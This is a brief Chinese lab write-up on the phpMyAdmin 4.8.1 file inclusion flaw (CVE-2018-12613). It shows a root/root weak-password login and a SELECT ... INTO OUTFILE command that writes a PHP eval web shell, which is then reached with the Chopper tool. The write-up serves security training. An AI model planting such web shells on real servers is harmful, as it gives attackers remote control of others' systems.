墨者学院_phpMyAdmin后台文件包含分析溯源

墨者学院_phpMyAdmin后台文件包含分析溯源

在这里插入图片描述
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,
通过二次编码即可绕过检查,造成远程文件包含漏洞。
受影响版本:
phpMyAdmin 4.8.0和4.8.1受到影响
前台可以使用弱口令直接登录

1.打开靶场,看见登录窗口,使用弱口令登录(root,root)
在这里插入图片描述
2.在mysql下使用:select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php”
这里的hack是菜刀连接时候需要的口令
菜刀使用的链接是:http://219.153.49.228:48959/3.php
包含session文件。本次使用/tmp/sess_sessionid
在数据库窗口写入:
select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php” --> 这句是可以和菜刀连接的
select “<?php phpinfo();?>” into outfile “/var/www/html/3.php” --> 这句是在浏览器可以看到的
在这里插入图片描述在这里插入图片描述
从之前的笔记整理出来的,可能有些乱,不过要点基本都在,需要的同学翻一翻


版权声明:本文为cc_de_csdn原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。